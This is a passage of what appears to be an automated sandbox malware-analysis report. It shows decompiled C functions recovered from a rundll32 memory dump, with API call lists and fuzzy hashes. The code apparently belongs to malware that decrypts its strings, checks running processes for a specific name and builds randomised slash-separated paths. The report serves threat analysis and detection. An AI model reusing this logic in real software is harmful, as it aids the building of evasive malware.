                                          • GetLastError.KERNEL32 ref: 0677AA15
                                          • GetLastError.KERNEL32 ref: 0677AAC0
                                            • Part of subcall function 0677147E: HeapFree.KERNEL32(00000000,00000000,06771D11,00000000,?,?,-00000008), ref: 0677148A
                                          Memory Dump Source
                                          • Source File: 00000012.00000002.346328294.0000000006771000.00000020.00020000.sdmp, Offset: 06770000, based on PE: true
                                          • Associated: 00000012.00000002.346318184.0000000006770000.00000004.00020000.sdmp
                                          • Associated: 00000012.00000002.346339984.000000000677C000.00000002.00020000.sdmp
                                          • Associated: 00000012.00000002.346346906.000000000677D000.00000004.00020000.sdmp
                                          • Associated: 00000012.00000002.346355523.000000000677F000.00000002.00020000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_18_2_6770000_rundll32.jbxd
                                          Similarity
                                          • API ID: ErrorHeapLast$AllocateEventFreeResetlstrlen
                                          • String ID:
                                          • API String ID: 943265810-0
                                          • Opcode ID: c56ac168dbcbe7a85cfe71b64e2fb2c3a86b35388083c1e2e2e938373eac4cf2
                                          • Instruction ID: afa3f6aaa227ff71a66d7e6e30c475e3b680319de1880f8c5fa6981f77258c30
                                          • Opcode Fuzzy Hash: c56ac168dbcbe7a85cfe71b64e2fb2c3a86b35388083c1e2e2e938373eac4cf2
                                          • Instruction Fuzzy Hash: 69418D71A00304BFEB719FA1CD48EAF7BBEEF89700B158929F642E1190E771A544CB60
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 39%
                                          			E06778F08(void* __eax) {
                                          				char _v8;
                                          				void* _v12;
                                          				intOrPtr _v16;
                                          				char _v20;
                                          				void* __esi;
                                          				intOrPtr _t36;
                                          				intOrPtr* _t37;
                                          				intOrPtr* _t39;
                                          				void* _t53;
                                          				long _t58;
                                          				void* _t59;
                                          
                                          				_t59 = __eax;
                                          				_t58 = 0;
                                          				ResetEvent( *(__eax + 0x1c));
                                          				_push( &_v8);
                                          				_push(4);
                                          				_push( &_v20);
                                          				_push( *((intOrPtr*)(_t59 + 0x18)));
                                          				if( *0x677d138() != 0) {
                                          					L5:
                                          					if(_v8 == 0) {
                                          						 *((intOrPtr*)(_t59 + 0x30)) = 0;
                                          						L21:
                                          						return _t58;
                                          					}
                                          					 *0x677d168(0, 1,  &_v12);
                                          					if(0 != 0) {
                                          						_t58 = 8;
                                          						goto L21;
                                          					}
                                          					_t36 = E067758BE(0x1000);
                                          					_v16 = _t36;
                                          					if(_t36 == 0) {
                                          						_t58 = 8;
                                          						L18:
                                          						_t37 = _v12;
                                          						 *((intOrPtr*)( *_t37 + 8))(_t37);
                                          						goto L21;
                                          					}
                                          					_push(0);
                                          					_push(_v8);
                                          					_push( &_v20);
                                          					while(1) {
                                          						_t39 = _v12;
                                          						_t56 =  *_t39;
                                          						 *((intOrPtr*)( *_t39 + 0x10))(_t39);
                                          						ResetEvent( *(_t59 + 0x1c));
                                          						_push( &_v8);
                                          						_push(0x1000);
                                          						_push(_v16);
                                          						_push( *((intOrPtr*)(_t59 + 0x18)));
                                          						if( *0x677d138() != 0) {
                                          							goto L13;
                                          						}
                                          						_t58 = GetLastError();
                                          						if(_t58 != 0x3e5) {
                                          							L15:
                                          							E0677147E(_v16);
                                          							if(_t58 == 0) {
                                          								_t58 = E067716DB(_v12, _t59);
                                          							}
                                          							goto L18;
                                          						}
                                          						_t58 = E06779D3A( *(_t59 + 0x1c), _t56, 0xffffffff);
                                          						if(_t58 != 0) {
                                          							goto L15;
                                          						}
                                          						_t58 =  *((intOrPtr*)(_t59 + 0x28));
                                          						if(_t58 != 0) {
                                          							goto L15;
                                          						}
                                          						L13:
                                          						_t58 = 0;
                                          						if(_v8 == 0) {
                                          							goto L15;
                                          						}
                                          						_push(0);
                                          						_push(_v8);
                                          						_push(_v16);
                                          					}
                                          				}
                                          				_t58 = GetLastError();
                                          				if(_t58 != 0x3e5) {
                                          					L4:
                                          					if(_t58 != 0) {
                                          						goto L21;
                                          					}
                                          					goto L5;
                                          				}
                                          				_t58 = E06779D3A( *(_t59 + 0x1c), _t53, 0xffffffff);
                                          				if(_t58 != 0) {
                                          					goto L21;
                                          				}
                                          				_t58 =  *((intOrPtr*)(_t59 + 0x28));
                                          				goto L4;
                                          			}

                                          APIs
                                          • ResetEvent.KERNEL32(?), ref: 06778F1E
                                          • GetLastError.KERNEL32 ref: 06778F37
                                            • Part of subcall function 06779D3A: WaitForMultipleObjects.KERNEL32(00000002,0677AA33,00000000,0677AA33,?,?,?,0677AA33,0000EA60), ref: 06779D55
                                          • ResetEvent.KERNEL32(?), ref: 06778FB0
                                          • GetLastError.KERNEL32 ref: 06778FCB
                                          Memory Dump Source
                                          • Source File: 00000012.00000002.346328294.0000000006771000.00000020.00020000.sdmp, Offset: 06770000, based on PE: true
                                          • Associated: 00000012.00000002.346318184.0000000006770000.00000004.00020000.sdmp
                                          • Associated: 00000012.00000002.346339984.000000000677C000.00000002.00020000.sdmp
                                          • Associated: 00000012.00000002.346346906.000000000677D000.00000004.00020000.sdmp
                                          • Associated: 00000012.00000002.346355523.000000000677F000.00000002.00020000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_18_2_6770000_rundll32.jbxd
                                          Similarity
                                          • API ID: ErrorEventLastReset$MultipleObjectsWait
                                          • String ID:
                                          • API String ID: 2394032930-0
                                          • Opcode ID: ad7e6f045ecc6d90384bc1a8503998ef3f6bc30bb58dc2837392bebca5be16bf
                                          • Instruction ID: 3dc990272991e509ee3c082cc9532c8acb802075d462d072c81ccdd4739fc98a
                                          • Opcode Fuzzy Hash: ad7e6f045ecc6d90384bc1a8503998ef3f6bc30bb58dc2837392bebca5be16bf
                                          • Instruction Fuzzy Hash: 6031B832A20605EFDFA2DBA4CC44E6E77BAEF88350F154528E751D7190EB70E941DB50
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 87%
                                          			E067772F2(signed int _a4, signed int* _a8) {
                                          				void* __ecx;
                                          				void* __edi;
                                          				signed int _t6;
                                          				intOrPtr _t8;
                                          				intOrPtr _t12;
                                          				short* _t19;
                                          				void* _t25;
                                          				signed int* _t28;
                                          				CHAR* _t30;
                                          				long _t31;
                                          				intOrPtr* _t32;
                                          
                                          				_t6 =  *0x677d270; // 0xd448b889
                                          				_t32 = _a4;
                                          				_a4 = _t6 ^ 0x109a6410;
                                          				_t8 =  *0x677d2a4; // 0x4ca5a8
                                          				_t3 = _t8 + 0x677e836; // 0x61636f4c
                                          				_t25 = 0;
                                          				_t30 = E06776AF7(_t3, 1);
                                          				if(_t30 != 0) {
                                          					_t25 = CreateEventA(0x677d2a8, 1, 0, _t30);
                                          					E0677147E(_t30);
                                          				}
                                          				_t12 =  *0x677d25c; // 0x4000000a
                                          				if(_t12 <= 5 || _t12 == 6 && _t12 >= 2 ||  *_t32 == 0 || E067756A2() != 0) {
                                          					L12:
                                          					_t28 = _a8;
                                          					if(_t28 != 0) {
                                          						 *_t28 =  *_t28 | 0x00000001;
                                          					}
                                          					_t31 = E06771493(_t32, 0);
                                          					if(_t31 == 0 && _t25 != 0) {
                                          						_t31 = WaitForSingleObject(_t25, 0x4e20);
                                          					}
                                          					if(_t28 != 0 && _t31 != 0) {
                                          						 *_t28 =  *_t28 & 0xfffffffe;
                                          					}
                                          					goto L20;
                                          				} else {
                                          					_t19 =  *0x677d110( *_t32, 0x20);
                                          					if(_t19 != 0) {
                                          						 *_t19 = 0;
                                          						_t19 = _t19 + 2;
                                          					}
                                          					_t31 = E06777827(0,  *_t32, _t19, 0);
                                          					if(_t31 == 0) {
                                          						if(_t25 == 0) {
                                          							L22:
                                          							return _t31;
                                          						}
                                          						_t31 = WaitForSingleObject(_t25, 0x4e20);
                                          						if(_t31 == 0) {
                                          							L20:
                                          							if(_t25 != 0) {
                                          								CloseHandle(_t25);
                                          							}
                                          							goto L22;
                                          						}
                                          					}
                                          					goto L12;
                                          				}
                                          			}

                                          APIs
                                            • Part of subcall function 06776AF7: lstrlen.KERNEL32(?,00000000,00000000,00000027,00000005,00000000,00000000,06772098,74666F53,00000000,?,0677D00C,?,?), ref: 06776B2D
                                            • Part of subcall function 06776AF7: lstrcpy.KERNEL32(00000000,00000000), ref: 06776B51
                                            • Part of subcall function 06776AF7: lstrcat.KERNEL32(00000000,00000000), ref: 06776B59
                                          • CreateEventA.KERNEL32(0677D2A8,00000001,00000000,00000000,61636F4C,00000001,00000000,?,?,00000000,?,0677555B,?,?,?), ref: 06777333
                                            • Part of subcall function 0677147E: HeapFree.KERNEL32(00000000,00000000,06771D11,00000000,?,?,-00000008), ref: 0677148A
                                          • WaitForSingleObject.KERNEL32(00000000,00004E20,0677555B,00000000,00000000,?,00000000,?,0677555B,?,?,?), ref: 06777393
                                          • WaitForSingleObject.KERNEL32(00000000,00004E20,61636F4C,00000001,00000000,?,?,00000000,?,0677555B,?,?,?), ref: 067773C1
                                          • CloseHandle.KERNEL32(00000000,61636F4C,00000001,00000000,?,?,00000000,?,0677555B,?,?,?), ref: 067773D9
                                          Memory Dump Source
                                          • Source File: 00000012.00000002.346328294.0000000006771000.00000020.00020000.sdmp, Offset: 06770000, based on PE: true
                                          • Associated: 00000012.00000002.346318184.0000000006770000.00000004.00020000.sdmp
                                          • Associated: 00000012.00000002.346339984.000000000677C000.00000002.00020000.sdmp
                                          • Associated: 00000012.00000002.346346906.000000000677D000.00000004.00020000.sdmp
                                          • Associated: 00000012.00000002.346355523.000000000677F000.00000002.00020000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_18_2_6770000_rundll32.jbxd
                                          Similarity
                                          • API ID: ObjectSingleWait$CloseCreateEventFreeHandleHeaplstrcatlstrcpylstrlen
                                          • String ID:
                                          • API String ID: 73268831-0
                                          • Opcode ID: 26a6e8561d45832dd7c15400dbc4fa2fcb67afe030d573fa1d398c4262a6089e
                                          • Instruction ID: 33cd16167cae70b29710646aa78df643ec050ef122023bb61f46725bc54b8905
                                          • Opcode Fuzzy Hash: 26a6e8561d45832dd7c15400dbc4fa2fcb67afe030d573fa1d398c4262a6089e
                                          • Instruction Fuzzy Hash: CD210772E103929BCFB55A7C9C84A7B739AFF88714B054625FE61EB148DB70C801C790
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 38%
                                          			E0677A1F1(void* __ecx, void* __esi) {
                                          				char _v8;
                                          				long _v12;
                                          				char _v16;
                                          				long _v20;
                                          				long _t34;
                                          				long _t39;
                                          				long _t42;
                                          				long _t56;
                                          				intOrPtr _t58;
                                          				void* _t59;
                                          				intOrPtr* _t60;
                                          				void* _t61;
                                          
                                          				_t61 = __esi;
                                          				_t59 = __ecx;
                                          				_t60 =  *0x677d140; // 0x677ad41
                                          				 *((intOrPtr*)(__esi + 0x2c)) = 0;
                                          				do {
                                          					_t34 = WaitForSingleObject( *(_t61 + 0x1c), 0);
                                          					_v20 = _t34;
                                          					if(_t34 != 0) {
                                          						L3:
                                          						_push( &_v16);
                                          						_push( &_v8);
                                          						_push(_t61 + 0x2c);
                                          						_push(0x20000013);
                                          						_push( *((intOrPtr*)(_t61 + 0x18)));
                                          						_v8 = 4;
                                          						_v16 = 0;
                                          						if( *_t60() == 0) {
                                          							_t39 = GetLastError();
                                          							_v12 = _t39;
                                          							if(_v20 == 0 || _t39 != 0x2ef3) {
                                          								L15:
                                          								return _v12;
                                          							} else {
                                          								goto L11;
                                          							}
                                          						}
                                          						if(_v8 != 4 ||  *((intOrPtr*)(_t61 + 0x2c)) == 0) {
                                          							goto L11;
                                          						} else {
                                          							_v16 = 0;
                                          							_v8 = 0;
                                          							 *_t60( *((intOrPtr*)(_t61 + 0x18)), 0x16, 0,  &_v8,  &_v16);
                                          							_t58 = E067758BE(_v8 + 1);
                                          							if(_t58 == 0) {
                                          								_v12 = 8;
                                          							} else {
                                          								_push( &_v16);
                                          								_push( &_v8);
                                          								_push(_t58);
                                          								_push(0x16);
                                          								_push( *((intOrPtr*)(_t61 + 0x18)));
                                          								if( *_t60() == 0) {
                                          									E0677147E(_t58);
                                          									_v12 = GetLastError();
                                          								} else {
                                          									 *((char*)(_t58 + _v8)) = 0;
                                          									 *((intOrPtr*)(_t61 + 0xc)) = _t58;
                                          								}
                                          							}
                                          							goto L15;
                                          						}
                                          					}
                                          					SetEvent( *(_t61 + 0x1c));
                                          					_t56 =  *((intOrPtr*)(_t61 + 0x28));
                                          					_v12 = _t56;
                                          					if(_t56 != 0) {
                                          						goto L15;
                                          					}
                                          					goto L3;
                                          					L11:
                                          					_t42 = E06779D3A( *(_t61 + 0x1c), _t59, 0xea60);
                                          					_v12 = _t42;
                                          				} while (_t42 == 0);
                                          				goto L15;
                                          			}

                                          APIs
                                          • WaitForSingleObject.KERNEL32(?,00000000,00000000,00000102,?,00000000,00000000,751881D0), ref: 0677A208
                                          • SetEvent.KERNEL32(?), ref: 0677A218
                                          • GetLastError.KERNEL32 ref: 0677A2A1
                                            • Part of subcall function 06779D3A: WaitForMultipleObjects.KERNEL32(00000002,0677AA33,00000000,0677AA33,?,?,?,0677AA33,0000EA60), ref: 06779D55
                                            • Part of subcall function 0677147E: HeapFree.KERNEL32(00000000,00000000,06771D11,00000000,?,?,-00000008), ref: 0677148A
                                          • GetLastError.KERNEL32(00000000), ref: 0677A2D6
                                          Memory Dump Source
                                          • Source File: 00000012.00000002.346328294.0000000006771000.00000020.00020000.sdmp, Offset: 06770000, based on PE: true
                                          • Associated: 00000012.00000002.346318184.0000000006770000.00000004.00020000.sdmp
                                          • Associated: 00000012.00000002.346339984.000000000677C000.00000002.00020000.sdmp
                                          • Associated: 00000012.00000002.346346906.000000000677D000.00000004.00020000.sdmp
                                          • Associated: 00000012.00000002.346355523.000000000677F000.00000002.00020000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_18_2_6770000_rundll32.jbxd
                                          Similarity
                                          • API ID: ErrorLastWait$EventFreeHeapMultipleObjectObjectsSingle
                                          • String ID:
                                          • API String ID: 602384898-0
                                          • Opcode ID: 075fe6191633ac2944517212fa2ff1f414a8c4384b18da7031b2aefa19779023
                                          • Instruction ID: 6f3017172f2c3641acb133627a9ba39401d6e3a4078d85e21a40f3fb62ac5cef
                                          • Opcode Fuzzy Hash: 075fe6191633ac2944517212fa2ff1f414a8c4384b18da7031b2aefa19779023
                                          • Instruction Fuzzy Hash: AD312EB5D00309EFEF61DFE6CC849AEBBB8EF49204F10896AE642E2140D7319A45DF50
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 39%
                                          			E067754AC(void* __ecx, void* __eflags, intOrPtr _a4, signed int* _a8, intOrPtr _a12) {
                                          				intOrPtr _v12;
                                          				void* _v16;
                                          				void* _v28;
                                          				char _v32;
                                          				void* __esi;
                                          				void* _t29;
                                          				void* _t38;
                                          				signed int* _t39;
                                          				void* _t40;
                                          
                                          				_t36 = __ecx;
                                          				_v32 = 0;
                                          				asm("stosd");
                                          				asm("stosd");
                                          				asm("stosd");
                                          				asm("stosd");
                                          				asm("stosd");
                                          				_v12 = _a4;
                                          				_t38 = E06774F1F(__ecx,  &_v32);
                                          				if(_t38 != 0) {
                                          					L12:
                                          					_t39 = _a8;
                                          					L13:
                                          					if(_t39 != 0 && ( *_t39 & 0x00000001) == 0) {
                                          						_t23 =  &(_t39[1]);
                                          						if(_t39[1] != 0) {
                                          							E06775749(_t23);
                                          						}
                                          					}
                                          					return _t38;
                                          				}
                                          				if(E06779138(0x40,  &_v16) != 0) {
                                          					_v16 = 0;
                                          				}
                                          				_t40 = CreateEventA(0x677d2a8, 1, 0,  *0x677d340);
                                          				if(_t40 != 0) {
                                          					SetEvent(_t40);
                                          					Sleep(0xbb8);
                                          					CloseHandle(_t40);
                                          				}
                                          				_push( &_v32);
                                          				if(_a12 == 0) {
                                          					_t29 = E06779575(_t36);
                                          				} else {
                                          					_push(0);
                                          					_push(0);
                                          					_push(0);
                                          					_push(0);
                                          					_push(0);
                                          					_t29 = E0677A642(_t36);
                                          				}
                                          				_t41 = _v16;
                                          				_t38 = _t29;
                                          				if(_v16 != 0) {
                                          					E0677568A(_t41);
                                          				}
                                          				if(_t38 != 0) {
                                          					goto L12;
                                          				} else {
                                          					_t39 = _a8;
                                          					_t38 = E067772F2( &_v32, _t39);
                                          					goto L13;
                                          				}
                                          			}

                                          APIs
                                          • CreateEventA.KERNEL32(0677D2A8,00000001,00000000,00000040,?,?,7519F710,00000000,7519F730), ref: 067754FD
                                          • SetEvent.KERNEL32(00000000), ref: 0677550A
                                          • Sleep.KERNEL32(00000BB8), ref: 06775515
                                          • CloseHandle.KERNEL32(00000000), ref: 0677551C
                                            • Part of subcall function 06779575: WaitForSingleObject.KERNEL32(00000000,?,?,?,0677553C,?,0677553C,?,?,?,?,?,0677553C,?), ref: 0677964F
                                          Memory Dump Source
                                          • Source File: 00000012.00000002.346328294.0000000006771000.00000020.00020000.sdmp, Offset: 06770000, based on PE: true
                                          • Associated: 00000012.00000002.346318184.0000000006770000.00000004.00020000.sdmp
                                          • Associated: 00000012.00000002.346339984.000000000677C000.00000002.00020000.sdmp
                                          • Associated: 00000012.00000002.346346906.000000000677D000.00000004.00020000.sdmp
                                          • Associated: 00000012.00000002.346355523.000000000677F000.00000002.00020000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_18_2_6770000_rundll32.jbxd
                                          Similarity
                                          • API ID: Event$CloseCreateHandleObjectSingleSleepWait
                                          • String ID:
                                          • API String ID: 2559942907-0
                                          • Opcode ID: 1c769f768d84fa7d3fcc62bd2449d1ae79347ff995dc63db29f50f3165daa76b
                                          • Instruction ID: ba0fd4517a307a30533a4b40f8da0755d46b11501e4c2a051434cd2325ba92ac
                                          • Opcode Fuzzy Hash: 1c769f768d84fa7d3fcc62bd2449d1ae79347ff995dc63db29f50f3165daa76b
                                          • Instruction Fuzzy Hash: E3214872D00115AFDF90BFE4DC849AE77BBEF44254B058425EB22E7100DE74DA41CBA1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 78%
                                          			E06771295(intOrPtr* __eax, void** _a4, intOrPtr* _a8) {
                                          				intOrPtr _v8;
                                          				void* _v12;
                                          				void* _v16;
                                          				intOrPtr _t26;
                                          				intOrPtr* _t28;
                                          				intOrPtr _t31;
                                          				intOrPtr* _t32;
                                          				void* _t39;
                                          				int _t46;
                                          				intOrPtr* _t47;
                                          				int _t48;
                                          
                                          				_t47 = __eax;
                                          				_push( &_v12);
                                          				_push(__eax);
                                          				_t39 = 0;
                                          				_t46 = 0;
                                          				_t26 =  *((intOrPtr*)( *__eax + 0x24))();
                                          				_v8 = _t26;
                                          				if(_t26 < 0) {
                                          					L13:
                                          					return _v8;
                                          				}
                                          				if(_v12 == 0) {
                                          					Sleep(0xc8);
                                          					_v8 =  *((intOrPtr*)( *_t47 + 0x24))(_t47,  &_v12);
                                          				}
                                          				if(_v8 >= _t39) {
                                          					_t28 = _v12;
                                          					if(_t28 != 0) {
                                          						_t31 =  *((intOrPtr*)( *_t28 + 0x100))(_t28,  &_v16);
                                          						_v8 = _t31;
                                          						if(_t31 >= 0) {
                                          							_t46 = lstrlenW(_v16);
                                          							if(_t46 != 0) {
                                          								_t46 = _t46 + 1;
                                          								_t48 = _t46 + _t46;
                                          								_t39 = E067758BE(_t48);
                                          								if(_t39 == 0) {
                                          									_v8 = 0x8007000e;
                                          								} else {
                                          									memcpy(_t39, _v16, _t48);
                                          								}
                                          								__imp__#6(_v16);
                                          							}
                                          						}
                                          						_t32 = _v12;
                                          						 *((intOrPtr*)( *_t32 + 8))(_t32);
                                          					}
                                          					 *_a4 = _t39;
                                          					 *_a8 = _t46 + _t46;
                                          				}
                                          				goto L13;
                                          			}















                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000012.00000002.346328294.0000000006771000.00000020.00020000.sdmp, Offset: 06770000, based on PE: true
                                          • Associated: 00000012.00000002.346318184.0000000006770000.00000004.00020000.sdmp
                                          • Associated: 00000012.00000002.346339984.000000000677C000.00000002.00020000.sdmp
                                          • Associated: 00000012.00000002.346346906.000000000677D000.00000004.00020000.sdmp
                                          • Associated: 00000012.00000002.346355523.000000000677F000.00000002.00020000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_18_2_6770000_rundll32.jbxd
                                          Similarity
                                          • API ID: FreeSleepStringlstrlenmemcpy
                                          • String ID:
                                          • API String ID: 1198164300-0
                                          • Opcode ID: 9c679204c7ed4dd8a1f7773a1e3bd1a650cad6efa36575018f7b2ebe9dee4f38
                                          • Instruction ID: 25776a8a1e2cdfd6e0027553fe98401fff45d653fadaa36329b1a2c77839d117
                                          • Opcode Fuzzy Hash: 9c679204c7ed4dd8a1f7773a1e3bd1a650cad6efa36575018f7b2ebe9dee4f38
                                          • Instruction Fuzzy Hash: FF21607590120AEFDB51DFA4C8889DEBBB9FF48200B1481A9EA11E7200EB30DA01CF50
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 68%
                                          			E06774858(unsigned int __eax, void* __ecx) {
                                          				void* _v8;
                                          				void* _v12;
                                          				signed int _t21;
                                          				signed short _t23;
                                          				char* _t27;
                                          				void* _t29;
                                          				void* _t30;
                                          				unsigned int _t33;
                                          				void* _t37;
                                          				unsigned int _t38;
                                          				void* _t41;
                                          				void* _t42;
                                          				int _t45;
                                          				void* _t46;
                                          
                                          				_t42 = __eax;
                                          				__imp__(__eax, _t37, _t41, _t29, __ecx, __ecx);
                                          				_t38 = __eax;
                                          				_t30 = RtlAllocateHeap( *0x677d238, 0, (__eax >> 3) + __eax + 1);
                                          				_v12 = _t30;
                                          				if(_t30 != 0) {
                                          					_v8 = _t42;
                                          					do {
                                          						_t33 = 0x18;
                                          						if(_t38 <= _t33) {
                                          							_t33 = _t38;
                                          						}
                                          						_t21 =  *0x677d250; // 0x72601424
                                          						_t23 = 0x3c6ef35f + _t21 * 0x19660d;
                                          						 *0x677d250 = _t23;
                                          						_t45 = (_t23 & 0x0000ffff) % (_t33 + 0xfffffff8) + 8;
                                          						memcpy(_t30, _v8, _t45);
                                          						_v8 = _v8 + _t45;
                                          						_t27 = _t30 + _t45;
                                          						_t38 = _t38 - _t45;
                                          						_t46 = _t46 + 0xc;
                                          						 *_t27 = 0x2f;
                                          						_t13 = _t27 + 1; // 0x1
                                          						_t30 = _t13;
                                          					} while (_t38 > 8);
                                          					memcpy(_t30, _v8, _t38 + 1);
                                          				}
                                          				return _v12;
                                          			}


















                                          APIs
                                          • lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,06774DBF,00000000,?,?,067752FE,?,06C495B0), ref: 06774863
                                          • RtlAllocateHeap.NTDLL(00000000,?), ref: 0677487B
                                          • memcpy.NTDLL(00000000,?,-00000008,?,?,?,06774DBF,00000000,?,?,067752FE,?,06C495B0), ref: 067748BF
                                          • memcpy.NTDLL(00000001,?,00000001), ref: 067748E0
                                          Similarity
                                          • API ID: memcpy$AllocateHeaplstrlen
                                          • String ID:
                                          • API String ID: 1819133394-0
                                          • Opcode ID: 7e64900107fbf2ae752970dd7bfe5040f98aeb1ae2711f2acb7027ad144a713d
                                          • Instruction ID: 6311a9a559b78bbc5b183b5dd5651312221b8a54254525dfddfd8c461457b322
                                          • Opcode Fuzzy Hash: 7e64900107fbf2ae752970dd7bfe5040f98aeb1ae2711f2acb7027ad144a713d
                                          • Instruction Fuzzy Hash: F11125B2A00158AFC710CF69DD88DAEBBEEEFD42A0B054176F604D7254EB709E00C7A0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 53%
                                          			E06776AF7(intOrPtr _a4, intOrPtr _a8) {
                                          				char _v20;
                                          				void* _t8;
                                          				void* _t13;
                                          				void* _t16;
                                          				char* _t18;
                                          				void* _t19;
                                          
                                          				_t19 = 0x27;
                                          				_t1 =  &_v20; // 0x74666f53
                                          				_t18 = 0;
                                          				E06776F89(_t8, _t1);
                                          				_t16 = E067758BE(_t19);
                                          				if(_t16 != 0) {
                                          					_t3 =  &_v20; // 0x74666f53
                                          					_t13 = E06779038(_t3, _t16, _a8);
                                          					if(_a4 != 0) {
                                          						__imp__(_a4);
                                          						_t19 = _t13 + 0x27;
                                          					}
                                          					_t18 = E067758BE(_t19);
                                          					if(_t18 != 0) {
                                          						 *_t18 = 0;
                                          						if(_a4 != 0) {
                                          							__imp__(_t18, _a4);
                                          						}
                                          						__imp__(_t18, _t16);
                                          					}
                                          					E0677147E(_t16);
                                          				}
                                          				return _t18;
                                          			}










                                          APIs
                                            • Part of subcall function 067758BE: RtlAllocateHeap.NTDLL(00000000,-00000008,06771C51), ref: 067758CA
                                            • Part of subcall function 06779038: wsprintfA.USER32 ref: 06779094
                                          • lstrlen.KERNEL32(?,00000000,00000000,00000027,00000005,00000000,00000000,06772098,74666F53,00000000,?,0677D00C,?,?), ref: 06776B2D
                                          • lstrcpy.KERNEL32(00000000,00000000), ref: 06776B51
                                          • lstrcat.KERNEL32(00000000,00000000), ref: 06776B59
                                          Strings
                                          Similarity
                                          • API ID: AllocateHeaplstrcatlstrcpylstrlenwsprintf
                                          • String ID: Soft
                                          • API String ID: 393707159-3753413193
                                          • Opcode ID: fc5a7121441ed9c682893a8faa7513d47b5709e7ddb721924757f23ff534ea79
                                          • Instruction ID: 1910adf59ad652461bf0c269a1d03ba7aebb2696379a956781cc673d6b3b62e9
                                          • Opcode Fuzzy Hash: fc5a7121441ed9c682893a8faa7513d47b5709e7ddb721924757f23ff534ea79
                                          • Instruction Fuzzy Hash: 7F012672600606BBDF922BA88C88EFF3B6DDF86245F144025FB1096108DB34C905C7E1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 68%
                                          			E067756A2() {
                                          				char _v264;
                                          				void* _v300;
                                          				int _t8;
                                          				intOrPtr _t9;
                                          				int _t15;
                                          				void* _t17;
                                          
                                          				_t15 = 0;
                                          				_t17 = CreateToolhelp32Snapshot(2, 0);
                                          				if(_t17 != 0) {
                                          					_t8 = Process32First(_t17,  &_v300);
                                          					while(_t8 != 0) {
                                          						_t9 =  *0x677d2a4; // 0x4ca5a8
                                          						_t2 = _t9 + 0x677ee38; // 0x73617661
                                          						_push( &_v264);
                                          						if( *0x677d0fc() != 0) {
                                          							_t15 = 1;
                                          						} else {
                                          							_t8 = Process32Next(_t17,  &_v300);
                                          							continue;
                                          						}
                                          						L7:
                                          						CloseHandle(_t17);
                                          						goto L8;
                                          					}
                                          					goto L7;
                                          				}
                                          				L8:
                                          				return _t15;
                                          			}










                                          APIs
                                          • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 067756B2
                                          • Process32First.KERNEL32(00000000,?), ref: 067756C5
                                          • Process32Next.KERNEL32(00000000,?), ref: 067756F1
                                          • CloseHandle.KERNEL32(00000000), ref: 06775700
                                          Similarity
                                          • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                          • String ID:
                                          • API String ID: 420147892-0
                                          • Opcode ID: a6e6fe0547bfbae34e2957aa72c8f2a1328d75f41f3c52007dcf260cfe9e78d7
                                          • Instruction ID: 0669a61ce916ac8e99dac3ce6404354acbc0d00717f732450ccedd4eb5bb01a2
                                          • Opcode Fuzzy Hash: a6e6fe0547bfbae34e2957aa72c8f2a1328d75f41f3c52007dcf260cfe9e78d7
                                          • Instruction Fuzzy Hash: 59F09672A011655AFBA0A7369C48DEB76ADDFC5614F004051EA15D6040FA60DA46C6E5
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 100%
                                          			E06777283(void* __esi) {
                                          				struct _SECURITY_ATTRIBUTES* _v4;
                                          				void* _t8;
                                          				void* _t10;
                                          
                                          				_v4 = 0;
                                          				memset(__esi, 0, 0x38);
                                          				_t8 = CreateEventA(0, 1, 0, 0);
                                          				 *(__esi + 0x1c) = _t8;
                                          				if(_t8 != 0) {
                                          					_t10 = CreateEventA(0, 1, 1, 0);
                                          					 *(__esi + 0x20) = _t10;
                                          					if(_t10 == 0) {
                                          						CloseHandle( *(__esi + 0x1c));
                                          					} else {
                                          						_v4 = 1;
                                          					}
                                          				}
                                          				return _v4;
                                          			}







                                          APIs
                                          • memset.NTDLL ref: 06777291
                                          • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,751881D0), ref: 067772A6
                                          • CreateEventA.KERNEL32(00000000,00000001,00000001,00000000), ref: 067772B3
                                          • CloseHandle.KERNEL32(?), ref: 067772C5
                                          Similarity
                                          • API ID: CreateEvent$CloseHandlememset
                                          • String ID:
                                          • API String ID: 2812548120-0
                                          • Opcode ID: 2099c79cdf1394d1dc3c5e12e207b6cf178a4744504c4dc8d31b46a14f6213ee
                                          • Instruction ID: 9ecde4e2c831e598ce3c0985c0a5f1a9cd72a70cde8c634291c26248b5697403
                                          • Opcode Fuzzy Hash: 2099c79cdf1394d1dc3c5e12e207b6cf178a4744504c4dc8d31b46a14f6213ee
                                          • Instruction Fuzzy Hash: 88F012F160430CBFD754AF66DCC4C27FBEDFB561A8B118D2EF15292511D672A8058AB0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 68%
                                          			E0677A2EF(int __eax, char _a4) {
                                          				void* _v0;
                                          				void* _t12;
                                          				int _t13;
                                          				int _t14;
                                          
                                          				_t1 =  &_a4; // 0x4d283a53
                                          				_t14 = __eax;
                                          				__imp__( *_t1);
                                          				_t13 = __eax;
                                          				if(__eax > __eax) {
                                          					_t14 = __eax;
                                          				}
                                          				_t2 = _t14 + 1; // 0x1
                                          				_t12 = E067758BE(_t2);
                                          				if(_t12 != 0) {
